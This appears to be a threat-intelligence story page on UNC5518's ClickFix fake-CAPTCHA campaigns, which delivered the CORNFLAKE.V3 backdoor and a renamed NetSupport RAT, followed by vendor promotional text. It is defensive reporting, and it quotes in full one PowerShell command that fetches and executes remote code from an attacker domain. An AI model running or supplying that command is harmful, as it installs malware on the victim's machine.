UNC5518 has compromised legitimate websites to display fraudulent CAPTCHA pages that use the ClickFix social-engineering technique, persuading visitors to paste and run a malicious PowerShell downloader. Mandiant assesses the cluster operates as an access-as-a-service provider: its initial-access framework has delivered the financially motivated UNC5774's CORNFLAKE.V3 backdoor, which uses JavaScript or PHP components to retrieve payloads over HTTP, execute them on disk, collect basic host data, and establish Registry Run-key persistence. Observed infrastructure also used Cloudflare Tunnels to proxy command-and-control traffic.
A separate ClickFix chain executed powershell.exe -c "iex(irm fixconfig[.]app)" and deployed a renamed NetSupport RAT client, Flaut.exe, through a multi-stage memory-resident PowerShell loader. The loader incorporated junk-code padding, encoded strings, hostname-based sandbox checks, locally compiled C# helper DLLs, Telegram victim reporting, and a payload hidden in a valid PNG; the installed RAT used laborado[.]net:443 and expendia[.]net:443 as gateways and persisted by hijacking a Startup-folder shortcut. Researchers assess this NetSupport activity is consistent with UNC5518-provided access being used by a downstream customer, plausibly UNC4108, rather than a targeted intrusion.

Get the actors, campaigns, and ATT&CK mapping behind it.
4 events from the most recent confirmed update back to the earliest known activity.
Since June 2024, UNC5518 has compromised legitimate websites to display fake CAPTCHA pages that use ClickFix lures to induce visitors to execute downloader scripts. Mandiant assesses the activity as an access-as-a-service operation used by multiple downstream actors.
The NetSupport deployment was assessed as consistent with UNC5518-provided ClickFix access being used by a downstream operator, plausibly UNC4108. The loader reported victim telemetry through a Telegram bot labeled ClickHunter and concealed its later-stage payload in a valid PNG file.
A ClickFix lure instructed victims to execute a PowerShell command that downloaded a memory-resident, multi-stage loader from fixconfig[.]app and ultimately installed a renamed NetSupport client, Flaut.exe. The payload used Startup-folder shortcut hijacking for persistence and was configured to use laborado[.]net and expendia[.]net HTTP gateways.
Mandiant identified a campaign in which a UNC5518 ClickFix downloader delivered CORNFLAKE.V3, a backdoor attributed to financially motivated UNC5774. The JavaScript and PHP variants retrieve and execute payloads, collect system information, and the V3 version adds Registry Run-key persistence.
Vulnerabilities, threat actors, malware, products, organizations, breaches, and observables Mallory has linked to this story. Indicator values are masked here and available in full in the app.
Indicator values are masked on this page. View all 10 in Mallory Domains, IPs, hashes, and URLs are exportable to your SIEM.
Get the adversaries, campaigns, and ATT&CK mapping behind this technique, with detections ready to deploy.
3 references tracked. Mallory keeps watching after this page renders.
shroudcloud.io
Open sourcecloud.google.com
Open sourcecybereason.com
Open sourceMap indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.